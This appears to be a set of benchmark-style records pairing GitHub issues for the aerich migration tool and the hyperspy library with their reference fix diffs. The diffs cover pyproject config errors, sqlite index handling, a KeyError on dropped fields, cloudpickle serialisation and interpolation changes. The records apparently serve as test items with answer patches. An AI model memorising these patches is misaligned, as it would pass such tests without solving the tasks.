"fastapi ~= 0.89.1",
# DB
"tortoise-orm[accel,asyncpg] ~= 0.19.2",
"aerich ~= 0.7.1",
]
[project.optional-dependencies]
dev = [
"pytest ~= 7.2.1",
"isort ~= 5.11.4",
"flake8 ~= 5.0.4",
"ipython",
]
```
| I've just had the same issue. This is because `aerich init` assumes the `[tool]` section exists in `pyproject.toml`. You can work around that by creating the section yourself, but `aerich` should check if it exists first...
I also have faced this issue. Is there any solution?
Solution is:
Create a file in your root project `pyproject.toml`
Here is my toml file. Please customize this as you needed
```
[project]
name = "project_name"
classifiers = ["Private :: Do Not Upload"]
version = "1"
dependencies = [
"blacksheep==2.0.7",
# DB
"tortoise-orm[asyncpg] ~= 0.21.3",
"aerich ~= 0.7.2",
]
[project.optional-dependencies]
dev = [
]
[tool.setuptools.packages] // this is important. If you don't add this link, you will get an error
find = {} # Scanning implicit namespaces is active by default
```
I tried to run `aerich init` and received the same error.
Probably unrelated, but for reference here is my full command
`docker compose exec server uv run aerich init -t app.db.TORTOISE_ORM`
In my case I already had `pyproject.toml` in the project root directory.
I manually added an empty `[tool.aerich]` table at the end of the file:
```pyproject.toml
[project]
name = "project"
version = "0.1.0"
# ...
[tool.aerich]
```
Rerun the command and initialization completed successfully.
In my case it added the following:
```pyproject.toml
# ...
[tool.aerich]
tortoise_orm = "app.db.TORTOISE_ORM"
location = "./migrations"
src_folder = "./."
``` | 2024-12-11T05:25:35 | 0.0 | [] | [] |
||
tortoise/aerich | tortoise__aerich-379 | c2ebe9b5e41ece1dd2800929e7bb5bc993a1e83a | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 6093d90..1b2fe83 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,7 @@
### [0.8.1](Unreleased)
#### Fixed
+- sqlite: failed to create/drop index. (#302)
- PostgreSQL: Cannot drop constraint after deleting or rename FK on a model. (#378)
- Sort m2m fields before comparing them with diff. (#271)
diff --git a/aerich/ddl/__init__.py b/aerich/ddl/__init__.py
index cb57274..11b355d 100644
--- a/aerich/ddl/__init__.py
+++ b/aerich/ddl/__init__.py
@@ -3,6 +3,7 @@
from tortoise import BaseDBAsyncClient, Model
from tortoise.backends.base.schema_generator import BaseSchemaGenerator
+from tortoise.backends.sqlite.schema_generator import SqliteSchemaGenerator
from aerich.utils import is_default_function
@@ -122,7 +123,12 @@ def _add_or_modify_column(self, model, field_describe: dict, is_pk: bool, modify
unique = ""
template = self._MODIFY_COLUMN_TEMPLATE
else:
- unique = "UNIQUE" if field_describe.get("unique") else ""
+ # sqlite does not support alter table to add unique column
+ unique = (
+ "UNIQUE"
+ if field_describe.get("unique") and self.DIALECT != SqliteSchemaGenerator.DIALECT
+ else ""
+ )
template = self._ADD_COLUMN_TEMPLATE
return template.format(
table_name=db_table,
diff --git a/aerich/ddl/sqlite/__init__.py b/aerich/ddl/sqlite/__init__.py
index 0ce1290..67dfd3a 100644
--- a/aerich/ddl/sqlite/__init__.py
+++ b/aerich/ddl/sqlite/__init__.py
@@ -10,6 +10,8 @@
class SqliteDDL(BaseDDL):
schema_generator_cls = SqliteSchemaGenerator
DIALECT = SqliteSchemaGenerator.DIALECT
+ _ADD_INDEX_TEMPLATE = 'CREATE {unique}INDEX "{index_name}" ON "{table_name}" ({column_names})'
+ _DROP_INDEX_TEMPLATE = 'DROP INDEX IF EXISTS "{index_name}"'
def modify_column(self, model: "Type[Model]", field_object: dict, is_pk: bool = True):
raise NotSupportError("Modify column is unsupported in SQLite.")
| aerich init-db with sqlite3 freezes
Hello,
I have been observing the same behavior reported at [here](https://github.com/tortoise/aerich/issues/63) while using aerich with sqlite
I have no problem when using the same models with postgres.
```
aerich init -s src/ -t tci.sqlite.database.TORTOISE_ORM
Success create migrate location ./migrations
Success write config to pyproject.toml
```
```
aerich init-db
Success create app migrate location migrations/models
Success generate schema for app "models"
^CException ignored in: <module 'threading' from '/usr/lib/python3.10/threading.py'>
Traceback (most recent call last):
File "/usr/lib/python3.10/threading.py", line 1567, in _shutdown
lock.acquire()
KeyboardInterrupt:
```
Test with no changes, working as expected
```
aerich init-db
Success create app migrate location migrations/models
Success generate schema for app "models"
^CException ignored in: <module 'threading' from '/usr/lib/python3.10/threading.py'>
Traceback (most recent call last):
File "/usr/lib/python3.10/threading.py", line 1567, in _shutdown
lock.acquire()
KeyboardInterrupt:
```
Removing the "acknowledged" column from the model
```
aerich migrate --name drop_column
Traceback (most recent call last):
File "my_dir/bin/aerich", line 8, in <module>
sys.exit(main())
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 258, in main
cli()
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1130, in __call__
return self.main(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1055, in main
rv = self.invoke(ctx)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1657, in invoke
return _process_result(sub_ctx.command.invoke(sub_ctx))
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1404, in invoke
return ctx.invoke(self.callback, **ctx.params)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 760, in invoke
return __callback(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/decorators.py", line 26, in new_func
return f(get_current_context(), *args, **kwargs)
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 31, in wrapper
loop.run_until_complete(f(*args, **kwargs))
File "/usr/lib/python3.10/asyncio/base_events.py", line 646, in run_until_complete
return future.result()
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 86, in migrate
ret = await command.migrate(name)
File "my_dir/lib/python3.10/site-packages/aerich/__init__.py", line 121, in migrate
return await Migrate.migrate(name)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 140, in migrate
cls.diff_models(cls._last_version_content, new_version_content)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 388, in diff_models
cls._drop_index(
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 527, in _drop_index
fields_name = cls._resolve_fk_fields_name(model, fields_name)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 512, in _resolve_fk_fields_name
field = model._meta.fields_map[field_name]
KeyError: 'acknowledged'
```
```
pip list |grep aerich
aerich 0.7.1
```
| I have tried the workaround described [here](https://github.com/tortoise/aerich/issues/295), i.e., downgrading to version 0.6.3.
That fixed the init-db, however the upgrade still fails.
```
Installing collected packages: aerich
Attempting uninstall: aerich
Found existing installation: aerich 0.7.0
Uninstalling aerich-0.7.0:
Successfully uninstalled aerich-0.7.0
Successfully installed aerich-0.6.3
```
```
aerich init -s src/ -t tci.sqlite.database.TORTOISE_ORM
Success create migrate location ./migrations
Success write config to pyproject.toml
```
```
aerich init-db
Success create app migrate location migrations/models
Success generate schema for app "models"
```
```
aerich migrate --name opsgenie_comment_column_dropped
Success migrate 5_20230518173359_opsgenie_comment_column_dropped.sql
(opsgenie_to_jira) mic@U333633:my_dir$ aerich upgrade
Traceback (most recent call last):
File "my_dir/lib/python3.10/site-packages/tortoise/backends/sqlite/client.py", line 34, in translate_exceptions_
return await func(self, query, *args)
File "my_dir/lib/python3.10/site-packages/tortoise/backends/sqlite/client.py", line 155, in execute_script
await connection.executescript(query)
File "my_dir/lib/python3.10/site-packages/aiosqlite/core.py", line 216, in executescript
cursor = await self._execute(self._conn.executescript, sql_script)
File "my_dir/lib/python3.10/site-packages/aiosqlite/core.py", line 129, in _execute
return await future
File "my_dir/lib/python3.10/site-packages/aiosqlite/core.py", line 102, in run
result = function()
sqlite3.OperationalError: error in index idx_alert_acknowl_8a515a after drop column: no such column: acknowledged
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "my_dir/bin/aerich", line 8, in <module>
sys.exit(main())
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 257, in main
cli()
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1130, in __call__
return self.main(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1055, in main
rv = self.invoke(ctx)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1657, in invoke
return _process_result(sub_ctx.command.invoke(sub_ctx))
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1404, in invoke
return ctx.invoke(self.callback, **ctx.params)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 760, in invoke
return __callback(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/decorators.py", line 26, in new_func
return f(get_current_context(), *args, **kwargs)
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 31, in wrapper
loop.run_until_complete(f(*args, **kwargs))
File "/usr/lib/python3.10/asyncio/base_events.py", line 646, in run_until_complete
return future.result()
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 97, in upgrade
migrated = await command.upgrade()
File "my_dir/lib/python3.10/site-packages/aerich/__init__.py", line 55, in upgrade
await conn.execute_script(upgrade_query)
File "my_dir/lib/python3.10/site-packages/tortoise/backends/sqlite/client.py", line 36, in translate_exceptions_
raise OperationalError(exc)
tortoise.exceptions.OperationalError: error in index idx_alert_acknowl_8a515a after drop column: no such column: acknowledged
```
I have also tried not to have that column as an index, and in spite of the migration throwing an error, the upgrade succeeded
```
aerich migrate --name opsgenie_comment_column_dropped
Traceback (most recent call last):
File "my_dir/bin/aerich", line 8, in <module>
sys.exit(main())
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 257, in main
cli()
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1130, in __call__
return self.main(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1055, in main
rv = self.invoke(ctx)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1657, in invoke
return _process_result(sub_ctx.command.invoke(sub_ctx))
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1404, in invoke
return ctx.invoke(self.callback, **ctx.params)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 760, in invoke
return __callback(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/decorators.py", line 26, in new_func
return f(get_current_context(), *args, **kwargs)
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 31, in wrapper
loop.run_until_complete(f(*args, **kwargs))
File "/usr/lib/python3.10/asyncio/base_events.py", line 646, in run_until_complete
return future.result()
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 86, in migrate
ret = await command.migrate(name)
File "my_dir/lib/python3.10/site-packages/aerich/__init__.py", line 126, in migrate
return await Migrate.migrate(name)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 132, in migrate
cls.diff_models(cls._last_version_content, new_version_content)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 184, in diff_models
old_models.pop(_aerich, None)
AttributeError: 'NoneType' object has no attribute 'pop'
```
```
aerich upgrade
Success upgrade 5_20230518173819_None.sql
```
Try remove migratetions/models and aerich table and rerun migrate
I tried that, but to no avail.
Just in case you wish to reproduce the problem, here is a simple model.
```
class Alert(models.Model):
id = fields.IntField(pk=True)
opsgenie_id = fields.CharField(max_length=50, index=True, unique=True, null=False)
priority = fields.SmallIntField(null=False, index=True)
message = fields.TextField(null=False)
team = fields.CharField(max_length=20, null=False)
site = fields.CharField(max_length=10, null=False)
stage = fields.CharField(max_length=3, null=False)
created_at = fields.DatetimeField(null=True)
updated_at = fields.DatetimeField(null=True)
jira_id = fields.CharField(max_length=30)
acknowledged = fields.BooleanField(default=False, index=True, null=False) # try to remove this field
```
```
orm_config = {
"connections": {
"default": {
"engine": "tortoise.backends.sqlite",
"credentials": {"file_path": "db.sqlite3"},
}
},
"apps": {
"models": {
"models": ["tci.sqlite.models", "aerich.models"],
"default_connection": "default",
}
},
}
```
Same happened to me.
It'd be great if someone can provide any sort of workaround. | 2024-12-10T04:10:58 | 0.0 | [] | [] |
||
tortoise/aerich | tortoise__aerich-365 | 103470f4c1ca6bd20146368d3990a587afe75d09 | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 415b727..3cb2f49 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,7 +7,7 @@
- Correct the click import. (#360)
- Improve CLI help text and output. (#355)
- Fix mysql drop unique index raises OperationalError. (#346)
-
+- Fix KeyError when deleting a field with unqiue=True. (#364)
**Upgrade note:**
1. Use column name as unique key name for mysql
2. Drop support for Python3.7
diff --git a/aerich/migrate.py b/aerich/migrate.py
index 60132a3..20bd161 100644
--- a/aerich/migrate.py
+++ b/aerich/migrate.py
@@ -425,8 +425,9 @@ def diff_models(
upgrade,
)
if old_data_field["indexed"]:
+ is_unique_field = old_data_field.get("unique")
cls._add_operator(
- cls._drop_index(model, {db_column}),
+ cls._drop_index(model, {db_column}, is_unique_field),
upgrade,
True,
)
@@ -548,13 +549,17 @@ def drop_m2m(cls, table_name: str) -> str:
def _resolve_fk_fields_name(cls, model: Type[Model], fields_name: Iterable[str]) -> List[str]:
ret = []
for field_name in fields_name:
- field = model._meta.fields_map[field_name]
- if field.source_field:
- ret.append(field.source_field)
- elif field_name in model._meta.fk_fields:
- ret.append(field_name + "_id")
+ try:
+ field = model._meta.fields_map[field_name]
+ except KeyError:
+ # field dropped or to be add
+ pass
else:
- ret.append(field_name)
+ if field.source_field:
+ field_name = field.source_field
+ elif field_name in model._meta.fk_fields:
+ field_name += "_id"
+ ret.append(field_name)
return ret
@classmethod
| When deleting a field with unqiue=True it will raise KeyError
**Describe the bug**
When deleting a field with unqiue=True it will raise KeyError.
**To Reproduce**
version:
mysql8.0,tortoise-orm branch is develop(version 905daaa53928622b53454f65fd629690a7e5491f),aerich branch is dev(version 15d56121ef9d918f5dc826898c38c6b0513ec898)
Steps to Reproduction:
1.This is my model
```
class Tasks(Model):
"""任务表"""
id = fields.IntField(pk=True)
name = fields.CharField(max_length=100, unique=True, description="任务名称")
status = fields.IntEnumField(enum_type=TaskStatus, description="任务状态")
class Meta:
table = "tb_tasks"
```
2.Init db
```
aerich init -t utils.config.TORTOISE_CONFIG
aerich init-db
```
3.Delete the name field of the model from step 2
```
class Tasks(Model):
"""任务表"""
id = fields.IntField(pk=True)
status = fields.IntEnumField(enum_type=TaskStatus, description="任务状态")
class Meta:
table = "tb_tasks"
```
4.Migrate and upgrade
```
aerich migrate
aerich upgrade
```
5.It will raise a exception
`KeyError: 'name'`
Can't get "TORTOISE_ORM" from module
My workdir list:
```
.
├── Dockerfile
├── __init__.py
├── aerich.ini
├── docker-compose.yml
├── main.py
├── migrations
├── models.py
├── requirements.txt
└── settings.py
```
aerich.ini
```
[aerich]
tortoise_orm = settings.TORTOISE_ORM
location = ./migrations
```
settings.py
```
TORTOISE_ORM = dict()
```
I had got an error when executed `aerich init-db` in work folder root.
```
Error: Can't get "TORTOISE_ORM" from module "<module 'settings' from './settings.py'>"
```
|
TORTOISE_ORM can`t be empty
Hi,nice to you resolve it. | 2024-11-14T10:39:05 | 0.0 | [] | [] |
||
tortoise/aerich | tortoise__aerich-249 | 8f68f08eba7fbb218e2f1af51c5ecd9aed3b90ee | diff --git a/aerich/__init__.py b/aerich/__init__.py
index 7303e58..2eec79c 100644
--- a/aerich/__init__.py
+++ b/aerich/__init__.py
@@ -8,9 +8,9 @@
from tortoise.utils import get_schema_sql
from aerich.exceptions import DowngradeError
-from aerich.inspect.mysql import InspectMySQL
-from aerich.inspect.postgres import InspectPostgres
-from aerich.inspect.sqlite import InspectSQLite
+from aerich.inspectdb.mysql import InspectMySQL
+from aerich.inspectdb.postgres import InspectPostgres
+from aerich.inspectdb.sqlite import InspectSQLite
from aerich.migrate import Migrate
from aerich.models import Aerich
from aerich.utils import (
diff --git a/aerich/inspect/__init__.py b/aerich/inspectdb/__init__.py
similarity index 100%
rename from aerich/inspect/__init__.py
rename to aerich/inspectdb/__init__.py
diff --git a/aerich/inspect/mysql.py b/aerich/inspectdb/mysql.py
similarity index 98%
rename from aerich/inspect/mysql.py
rename to aerich/inspectdb/mysql.py
index 7d62bff..64dc2ba 100644
--- a/aerich/inspect/mysql.py
+++ b/aerich/inspectdb/mysql.py
@@ -1,6 +1,6 @@
from typing import List
-from aerich.inspect import Column, Inspect
+from aerich.inspectdb import Column, Inspect
class InspectMySQL(Inspect):
diff --git a/aerich/inspect/postgres.py b/aerich/inspectdb/postgres.py
similarity index 98%
rename from aerich/inspect/postgres.py
rename to aerich/inspectdb/postgres.py
index 8327618..0f22bb1 100644
--- a/aerich/inspect/postgres.py
+++ b/aerich/inspectdb/postgres.py
@@ -2,7 +2,7 @@
from tortoise import BaseDBAsyncClient
-from aerich.inspect import Column, Inspect
+from aerich.inspectdb import Column, Inspect
class InspectPostgres(Inspect):
diff --git a/aerich/inspect/sqlite.py b/aerich/inspectdb/sqlite.py
similarity index 98%
rename from aerich/inspect/sqlite.py
rename to aerich/inspectdb/sqlite.py
index 885b9c0..7f35e1f 100644
--- a/aerich/inspect/sqlite.py
+++ b/aerich/inspectdb/sqlite.py
@@ -1,6 +1,6 @@
from typing import List
-from aerich.inspect import Column, Inspect
+from aerich.inspectdb import Column, Inspect
class InspectSQLite(Inspect):
diff --git a/aerich/migrate.py b/aerich/migrate.py
index e114858..82d30ee 100644
--- a/aerich/migrate.py
+++ b/aerich/migrate.py
@@ -422,8 +422,14 @@ def diff_models(cls, old_models: Dict[str, dict], new_models: Dict[str, dict], u
cls._drop_index(model, (field_name,), unique), upgrade, True
)
elif option == "db_field_types.":
- # continue since repeated with others
- continue
+ if new_data_field.get("field_type") == "DecimalField":
+ # modify column
+ cls._add_operator(
+ cls._modify_field(model, new_data_field),
+ upgrade,
+ )
+ else:
+ continue
elif option == "default":
if not (
is_default_function(old_new[0]) or is_default_function(old_new[1])
| fields.DecimalField can`t change max_digits, decimal_places by migrate
### env
- tortoise-orm==0.19.1
- asyncmy==0.2.5
- aerich==0.6.3
### desc
longitude = fields.DecimalField(max_digits=12, decimal_places=9)
if change it to
longitude = fields.DecimalField(max_digits=16, decimal_places=14)
aerich cant`t generate migrate file.
| I have the same issue too :( Aerich shows "No changes detected"
> 我也有同样的问题 :( Aerich 显示“没有检测到变化”
final, write a migration sql file to change it. | 2022-06-27T03:36:42 | 0.0 | [] | [] |
||
hyperspy/hyperspy | hyperspy__hyperspy-3262 | 4cafc47daf68f0e01b9d64822736fe875c63f690 | diff --git a/hyperspy/component.py b/hyperspy/component.py
index d00d16ff24..676f24c079 100644
--- a/hyperspy/component.py
+++ b/hyperspy/component.py
@@ -721,11 +721,12 @@ def default_traits_view(self):
@add_gui_method(toolkey="hyperspy.Component")
class Component(t.HasTraits):
__axes_manager = None
+ # setting dtype for t.Property(t.Bool) causes serialization error with cloudpickle
+ active = t.Property()
+ name = t.Property()
- active = t.Property(t.CBool(True))
- name = t.Property(t.Str(''))
-
- def __init__(self, parameter_name_list, linear_parameter_list=None):
+ def __init__(self, parameter_name_list, linear_parameter_list=None, *args, **kwargs):
+ super().__init__(*args, **kwargs)
self.events = Events()
self.events.active_changed = Event("""
Event that triggers when the `Component.active` changes.
@@ -806,6 +807,8 @@ def _get_name(self):
return self._name
def _set_name(self, value):
+ if not isinstance(value, str):
+ raise ValueError('Only string values are permitted')
old_value = self._name
if old_value == value:
return
diff --git a/hyperspy/model.py b/hyperspy/model.py
index fc6da82b19..1015dc4ae4 100644
--- a/hyperspy/model.py
+++ b/hyperspy/model.py
@@ -125,7 +125,14 @@ def reconstruct_component(comp_dictionary, **init_args):
elif "_class_dump" in comp_dictionary:
# When a component is not registered using the extension mechanism,
# it is serialized using cloudpickle.
- _class = cloudpickle.loads(comp_dictionary['_class_dump'])
+ try:
+ _class = cloudpickle.loads(comp_dictionary['_class_dump'])
+ except TypeError: # pragma: no cover
+ # https://github.com/cloudpipe/cloudpickle/blob/master/README.md
+ raise TypeError("Pickling is not (always) supported between python "
+ "versions. As a result the custom class cannot be "
+ "loaded. Consider adding a custom Component using the "
+ "extension mechanism.")
else:
# For component saved with hyperspy <2.0 and moved to exspy
if comp_dictionary["_id_name"] in EXSPY_HSPY_COMPONENTS:
diff --git a/upcoming_changes/3262.bugfix.rst b/upcoming_changes/3262.bugfix.rst
new file mode 100644
index 0000000000..448b0c14ad
--- /dev/null
+++ b/upcoming_changes/3262.bugfix.rst
@@ -0,0 +1,2 @@
+Fix serialization error due to :py:class:`traits.api.Property` not being serializable if a dtype is specified.
+See #3261 for more details.
\ No newline at end of file
| Serialisation of custom component fails
I have tried to use the following code to generate a file with a saved custom component to dumps the class and I can't even saved the file:
```python
import hyperspy.api as hs
from hyperspy.component import Component
class CustomComponent(Component):
def __init__(self, p1=1, p2=2):
Component.__init__(self, ('p1', 'p2'))
self.p1.value = p1
self.p2.value = p2
self.p1.grad = self.grad_p1
self.p2.grad = self.grad_p2
def function(self, x):
p1 = self.p1.value
p2 = self.p2.value
return p1 + x * p2
def grad_p1(self, x):
return 0
def grad_p2(self, x):
return x
s = hs.signals.Signal1D(range(10))
m = s.create_model()
c = CustomComponent()
m.append(c)
m.store('a')
import hyperspy
version = hyperspy.__version__
s.save(f"hs{version}_custom_component.hspy")
```
It seems that saving custom component is broken., but surprisingly, the code is covered [according to codecov](https://app.codecov.io/gh/hyperspy/hyperspy/blob/RELEASE_next_major/hyperspy%2Fcomponent.py#L1215)...
_Originally posted by @ericpre in https://github.com/hyperspy/hyperspy/issues/3255#issuecomment-1800106824_
Serialisation of custom component fails
I have tried to use the following code to generate a file with a saved custom component to dumps the class and I can't even saved the file:
```python
import hyperspy.api as hs
from hyperspy.component import Component
class CustomComponent(Component):
def __init__(self, p1=1, p2=2):
Component.__init__(self, ('p1', 'p2'))
self.p1.value = p1
self.p2.value = p2
self.p1.grad = self.grad_p1
self.p2.grad = self.grad_p2
def function(self, x):
p1 = self.p1.value
p2 = self.p2.value
return p1 + x * p2
def grad_p1(self, x):
return 0
def grad_p2(self, x):
return x
s = hs.signals.Signal1D(range(10))
m = s.create_model()
c = CustomComponent()
m.append(c)
m.store('a')
import hyperspy
version = hyperspy.__version__
s.save(f"hs{version}_custom_component.hspy")
```
It seems that saving custom component is broken., but surprisingly, the code is covered [according to codecov](https://app.codecov.io/gh/hyperspy/hyperspy/blob/RELEASE_next_major/hyperspy%2Fcomponent.py#L1215)...
_Originally posted by @ericpre in https://github.com/hyperspy/hyperspy/issues/3255#issuecomment-1800106824_
| @ericpre are you getting an error read out? It just keeps on crashing the kernel that I am using when I test this in Jupyter.
There is error message as it kills the python process... Running from script is the same...
Just adding some more information here... The problem is related to cloud pickle not serializing the __class__ for a custom component.
https://github.com/hyperspy/hyperspy/blob/4cafc47daf68f0e01b9d64822736fe875c63f690/hyperspy/component.py#L1214-L1217
```python
import cloudpickle
cloudpickle.dumps(CustomComponent)
```
has the same result
Edit:
And interestingly:
```python
class ComponentSub(Component):
pass
cloudpickle.dumps(ComponentSub)
```
Fails as well even though
```python
cloudpickle.dumps(Component)
```
works
As @francisco-dlp suggested it seems to be a traits error specifically something to do with ??`t.Property`?? attributes.
Just playing around with some stuff to see what does and doesn't work...
```python
import traits.api as t
import cloudpickle
class TraitsObj(t.HasTraits):
name = t.Property(t.Str(''))
def __init__(self, name=""):
self._name = name
def _get_name(self):
return self._name
def _set_name(self, value):
self._name = value
cloudpickle.dumps(TraitsObj)
```
Appears to fail but this is a little weird because the `Component` class doesn't fail...
@ericpre are you getting an error read out? It just keeps on crashing the kernel that I am using when I test this in Jupyter.
There is error message as it kills the python process... Running from script is the same...
Just adding some more information here... The problem is related to cloud pickle not serializing the __class__ for a custom component.
https://github.com/hyperspy/hyperspy/blob/4cafc47daf68f0e01b9d64822736fe875c63f690/hyperspy/component.py#L1214-L1217
```python
import cloudpickle
cloudpickle.dumps(CustomComponent)
```
has the same result
Edit:
And interestingly:
```python
class ComponentSub(Component):
pass
cloudpickle.dumps(ComponentSub)
```
Fails as well even though
```python
cloudpickle.dumps(Component)
```
works
As @francisco-dlp suggested it seems to be a traits error specifically something to do with ??`t.Property`?? attributes.
Just playing around with some stuff to see what does and doesn't work...
```python
import traits.api as t
import cloudpickle
class TraitsObj(t.HasTraits):
name = t.Property(t.Str(''))
def __init__(self, name=""):
self._name = name
def _get_name(self):
return self._name
def _set_name(self, value):
self._name = value
cloudpickle.dumps(TraitsObj)
```
Appears to fail but this is a little weird because the `Component` class doesn't fail... | 2023-11-08T19:18:42 | 0.0 | [] | [] |
||
hyperspy/hyperspy | hyperspy__hyperspy-3233 | b1d4de908770713da75fbfa39e4dbb66acff8d7e | diff --git a/hyperspy/_components/scalable_fixed_pattern.py b/hyperspy/_components/scalable_fixed_pattern.py
index 9ba4b169c5..7b0b3f9c84 100644
--- a/hyperspy/_components/scalable_fixed_pattern.py
+++ b/hyperspy/_components/scalable_fixed_pattern.py
@@ -17,7 +17,7 @@
# along with HyperSpy. If not, see <https://www.gnu.org/licenses/#GPL>.
import numpy as np
-from scipy.interpolate import interp1d
+from scipy.interpolate import make_interp_spline
from hyperspy.component import Component
from hyperspy.ui_registry import add_gui_method
@@ -97,37 +97,23 @@ def interpolate(self, value):
self.xscale.free = value
self.shift.free = value
- def prepare_interpolator(self, kind='linear', fill_value=0, **kwargs):
+ def prepare_interpolator(self, **kwargs):
"""Prepare interpolation.
Parameters
----------
x : array
The spectral axis of the fixed pattern
- kind : str or int, optional
- Specifies the kind of interpolation as a string
- ('linear', 'nearest', 'zero', 'slinear', 'quadratic, 'cubic')
- or as an integer specifying the order of the spline interpolator
- to use. Default is 'linear'.
-
- fill_value : float, optional
- If provided, then this value will be used to fill in for requested
- points outside of the data range. If not provided, then the default
- is NaN.
-
- Notes
- -----
- Any extra keyword argument is passed to `scipy.interpolate.interp1d`
-
+ **kwargs : dict
+ Keywords argument are passed to
+ :py:func:`scipy.interpolate.make_interp_spline`
"""
- self.f = interp1d(
+ self.f = make_interp_spline(
self.signal.axes_manager.signal_axes[0].axis,
self.signal.data.squeeze(),
- kind=kind,
- bounds_error=False,
- fill_value=fill_value,
- **kwargs)
+ **kwargs
+ )
def _function(self, x, xscale, yscale, shift):
if self.interpolate is True:
diff --git a/hyperspy/_signals/signal1d.py b/hyperspy/_signals/signal1d.py
index 367c8ee1f7..401034a0ae 100644
--- a/hyperspy/_signals/signal1d.py
+++ b/hyperspy/_signals/signal1d.py
@@ -22,6 +22,7 @@
import warnings
import numpy as np
+import numpy.ma as ma
import dask.array as da
from scipy import interpolate
from scipy.signal import savgol_filter, medfilt
@@ -226,7 +227,11 @@ def interpolate1D(number_of_interpolation_points, data):
ch = len(data)
old_ax = np.linspace(0, 100, ch)
new_ax = np.linspace(0, 100, ch * ip - (ip - 1))
- interpolator = interpolate.interp1d(old_ax, data)
+
+ data = ma.masked_invalid(data)
+ interpolator = interpolate.make_interp_spline(
+ old_ax, data, k=1, check_finite=False,
+ )
return interpolator(new_ax)
@@ -256,9 +261,11 @@ def _shift1D(data, **kwargs):
if np.isnan(shift) or shift == 0:
return data
- #This is the interpolant function
- si = interpolate.interp1d(original_axis, data, bounds_error=False,
- fill_value=fill_value, kind=kind)
+ data = ma.masked_invalid(data)
+ # #This is the interpolant function
+ si = interpolate.make_interp_spline(
+ original_axis, data, k=1, check_finite=False
+ )
#Evaluate interpolated data at shifted positions
return si(original_axis-shift)
diff --git a/hyperspy/misc/eels/base_gos.py b/hyperspy/misc/eels/base_gos.py
index 24316a94ea..10ce56a8d9 100644
--- a/hyperspy/misc/eels/base_gos.py
+++ b/hyperspy/misc/eels/base_gos.py
@@ -153,4 +153,4 @@ def integrateq(self, onset_energy, angle, E0):
qint *= (4.0 * np.pi * a0 ** 2.0 * R ** 2 / E / T *
self.subshell_factor) * 1e28
self.qint = qint
- return interpolate.interp1d(E, qint, kind=3)
+ return interpolate.make_interp_spline(E, qint, k=3)
diff --git a/hyperspy/misc/eels/hydrogenic_gos.py b/hyperspy/misc/eels/hydrogenic_gos.py
index c960e76767..3286636d82 100644
--- a/hyperspy/misc/eels/hydrogenic_gos.py
+++ b/hyperspy/misc/eels/hydrogenic_gos.py
@@ -144,7 +144,9 @@ def integrateq(self, onset_energy, angle, E0):
lambda x: self.gosfunc(E, np.exp(x)),
math.log(qa0sqmin), math.log(qa0sqmax))[0])
self.qint = qint
- return interpolate.interp1d(self.energy_axis + energy_shift, qint)
+ return interpolate.make_interp_spline(
+ self.energy_axis + energy_shift, qint, k=1,
+ )
def gosfuncK(self, E, qa02):
# gosfunc calculates (=DF/DE) which IS PER EV AND PER ATOM
diff --git a/hyperspy/signal.py b/hyperspy/signal.py
index 2078c7c49a..a41ac02e1b 100644
--- a/hyperspy/signal.py
+++ b/hyperspy/signal.py
@@ -3112,32 +3112,30 @@ def interpolate_on_axis(self,
axis=0,
inplace=False,
degree=1):
- """Replaces the given `axis` with the provided `new_axis`
- and interpolates data accordingly using :py:func:`scipy.interpolate.make_interp_spline`.
+ """Replaces the given ``axis`` with the provided ``new_axis``
+ and interpolates data accordingly using
+ :py:func:`scipy.interpolate.make_interp_spline`.
Parameters
----------
new_axis : UniformDataAxis, DataAxis or FunctionalDataAxis
- Axis which replaces the one specified by the `axis` argument.
+ Axis which replaces the one specified by the ``axis`` argument.
If this new axis exceeds the range of the old axis,
a warning is raised that the data will be extrapolated.
-
axis : int or str, default=0
Specifies the axis which will be replaced using the index of the
axis in the `axes_manager`. The axis can be specified using the index of the
axis in `axes_manager` or the axis name.
-
inplace : bool, default=False
If ``True`` the data of `self` is replaced by the result and
the axis is changed inplace. Otherwise `self` is not changed
and a new signal with the changes incorporated is returned.
-
degree: int, default=1
Specifies the B-Spline degree of the used interpolator.
Returns
-------
- s : :py:class:`~hyperspy.signal.BaseSignal` (or subclass)
+ s : :py:class:`~.api.signals.BaseSignal` (or subclass)
A copy of the object with the axis exchanged and the data interpolated.
This only occurs when inplace is set to ``False``, otherwise nothing is returned.
"""
